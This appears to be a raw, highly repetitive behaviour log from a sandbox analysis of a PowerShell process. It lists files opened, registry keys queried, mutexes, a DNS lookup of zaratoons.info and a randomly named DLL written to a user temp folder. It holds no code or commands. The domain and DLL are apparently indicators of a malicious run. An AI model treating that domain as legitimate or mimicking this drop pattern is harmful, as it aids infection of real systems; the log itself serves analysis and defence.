c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
WinRegistryKey
Environment
HKEY_CURRENT_USER
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
HKEY_LOCAL_MACHINE
path
path
path
path
path
path
path
path
path
path
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
HKEY_LOCAL_MACHINE
path
path
path
path
path
path
path
path
path
path
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN
HKEY_LOCAL_MACHINE
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
WinRegistryKey
Environment
HKEY_CURRENT_USER
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
WinRegistryKey
Environment
HKEY_CURRENT_USER
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
HKEY_LOCAL_MACHINE
path
path
path
path
path
path
path
path
path
path
path
path
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
HKEY_LOCAL_MACHINE
path
path
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN
HKEY_LOCAL_MACHINE
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
windows\microsoft.net\framework64\v2.0.50727\config\machine.config
windows\microsoft.net\framework64\v2.0.50727\config\machine.config
c:\
c:\windows\microsoft.net\framework64\v2.0.50727\config\machine.config
config
File
STD_INPUT_HANDLE
Mutex
Global\.net clr networking
Mutex
Global\.net clr networking
Mutex
Global\.net clr networking
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
HKEY_LOCAL_MACHINE
path
path
path
path
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
HKEY_LOCAL_MACHINE
path
path
path
path
path
path
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN
HKEY_LOCAL_MACHINE
StackVersion
StackVersion
StackVersion
StackVersion
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds
HKEY_LOCAL_MACHINE
PipelineMaxStackSizeMB
PipelineMaxStackSizeMB
PipelineMaxStackSizeMB
WinRegistryKey
Software\Microsoft\Windows NT\CurrentVersion
HKEY_LOCAL_MACHINE
InstallationType
InstallationType
InstallationType
InstallationType
InstallationType
InstallationType
WinRegistryKey
SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance
HKEY_LOCAL_MACHINE
Library
Library
IsMultiInstance
IsMultiInstance
First Counter
First Counter
Library
Library
IsMultiInstance
IsMultiInstance
First Counter
First Counter
Library
Library
IsMultiInstance
IsMultiInstance
First Counter
First Counter
WinRegistryKey
SYSTEM\CurrentControlSet\Services\.net clr networking\Performance
HKEY_LOCAL_MACHINE
CategoryOptions
CategoryOptions
FileMappingSize
FileMappingSize
Counter Names
CategoryOptions
CategoryOptions
FileMappingSize
FileMappingSize
Counter Names
CategoryOptions
CategoryOptions
FileMappingSize
FileMappingSize
Counter Names
WinRegistryKey
HKEY_CURRENT_USER
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
HKEY_CURRENT_USER
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
HKEY_LOCAL_MACHINE
WinRegistryKey
SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds
HKEY_LOCAL_MACHINE
PipelineMaxStackSizeMB
DNSRecord
zaratoons.info
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
windows\microsoft.net\framework64\v2.0.50727\config\machine.config
windows\microsoft.net\framework64\v2.0.50727\config\machine.config
c:\
c:\windows\microsoft.net\framework64\v2.0.50727\config\machine.config
config
File
STD_INPUT_HANDLE
WinRegistryKey
Software\Microsoft\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
PSMODULEPATH
PSMODULEPATH
WinRegistryKey
Environment
HKEY_CURRENT_USER
PSMODULEPATH
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds
HKEY_LOCAL_MACHINE
PipelineMaxStackSizeMB
PipelineMaxStackSizeMB
DNSRecord
zaratoons.info
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
windows\microsoft.net\framework64\v2.0.50727\config\machine.config
windows\microsoft.net\framework64\v2.0.50727\config\machine.config
c:\
c:\windows\microsoft.net\framework64\v2.0.50727\config\machine.config
config
File
users\5p5nrgjn0js halpmcxz\appdata\local\temp\vthqexnegi.dll
users\5p5nrgjn0js halpmcxz\appdata\local\temp\vthqexnegi.dll
c:\
c:\users\5p5nrgjn0js halpmcxz\appdata\local\temp\vthqexnegi.dll
dll
File
STD_INPUT_HANDLE
Mutex
Global\.net clr networking
WinRegistryKey
Software\Microsoft\PowerShell\1
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\Windows NT\CurrentVersion
HKEY_LOCAL_MACHINE
InstallationType
InstallationType
InstallationType
InstallationType
WinRegistryKey
SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance
HKEY_LOCAL_MACHINE
Library
Library
IsMultiInstance
IsMultiInstance
First Counter
First Counter
Library
Library
IsMultiInstance
IsMultiInstance
First Counter
First Counter
WinRegistryKey
SYSTEM\CurrentControlSet\Services\.net clr networking\Performance
HKEY_LOCAL_MACHINE
CategoryOptions
CategoryOptions
FileMappingSize
FileMappingSize
Counter Names
CategoryOptions
CategoryOptions
FileMappingSize
FileMappingSize
Counter Names
WinRegistryKey
HKEY_CURRENT_USER
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
HKEY_CURRENT_USER
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
HKEY_LOCAL_MACHINE
WinRegistryKey
SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE
DNSRecord
zaratoons.info
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
